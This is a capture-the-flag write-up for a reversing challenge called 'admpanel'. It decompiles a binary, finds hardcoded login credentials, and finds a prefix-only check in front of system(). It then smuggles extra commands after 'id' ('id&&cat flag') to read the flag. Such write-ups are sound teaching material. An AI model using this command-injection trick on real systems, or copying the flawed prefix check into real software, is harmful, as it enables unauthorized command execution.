midnightsunctf - admpanel

ctf, reversing

The Challenge

We found this legacy admin panel. Someone has patched it though :(

This challenge contains a binary, which allows the execution of the system command “id” on the host, after a successfull authentication.

---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1

This challange has two tasks:

  • finding out the correct credentials for the authentication
  • how to bypass the command restriction

Loading the binary in Ghidra and renaming the functions, we can see that the credentials are harcoded:

void authentication(void)

{
  int iVar1;
  char local_408 [1024];
  
  printf("  Input username: ");
  fgets(&DAT_004040e0,0x400,stdin);
  iVar1 = strncmp(&DAT_004040e0,"admin",5);
  if (iVar1 == 0) {
    printf("  Input password: ");
    fgets(local_408,0x400,stdin);
    iVar1 = strncmp(local_408,"password",8);
    if (iVar1 == 0) {
      authenticationFlag = 1;
    }
    else {
      logger("AUTHENTICATE",0,0,"Error: Invalid password.");
    }
  }
  else {
    logger("AUTHENTICATE",0,0,"Error: Invalid username.");
  }
  return;
}

Looking further into the binary, we find the following function responsible to issue system commands to the host:

void execCommand(void)

{
  int iVar1;
  char local_408 [1024];
  
  if (authenticationFlag == 0) {
    logger(&DAT_00402160,0,0,"Error: unauthenticated user tried to execute a command.");
  }
  else {
    printf("  Command to execute: ");
    fgets(local_408,0x400,stdin);
    iVar1 = strncmp(local_408,"id",2);
    if (iVar1 == 0) {
      system(local_408);
    }
    else {
      puts("Any other commands than `id` have been disabled due to security concerns.");
      logger("EXEC_HONEYPOT",(ulong)authenticationFlag,&DAT_004040e0,local_408);
    }
  }
  return;
}

We can see, that the function passes our input buffer to system, once the strcmp with id validates to true. However, only the first 2 bytes of our input buffer are compared to it. Once that check is passed, our input gets passed to the system function.

Knowing this, we can append an arbitrary command to id:

---=-=-=-=-=-=-=-=-=---
-      Admin panel    -
-
- [0] - Help
- [1] - Authenticate
- [2] - Execute command
- [3] - Exit
---=-=-=-=-=-=-=-=-=---
 > 1
  Input username: admin
  Input password: password
 > 2
  Command to execute: id&&ls
uid=999(ctf) gid=999(ctf) groups=999(ctf)
chall
flag
redir.sh
 > 2
  Command to execute: id&&cat flag
uid=999(ctf) gid=999(ctf) groups=999(ctf)
midnight{n3v3r_4sk_b0bb_to_d0_S0m3TH4Ng}

About the author

All your $rip belong to us.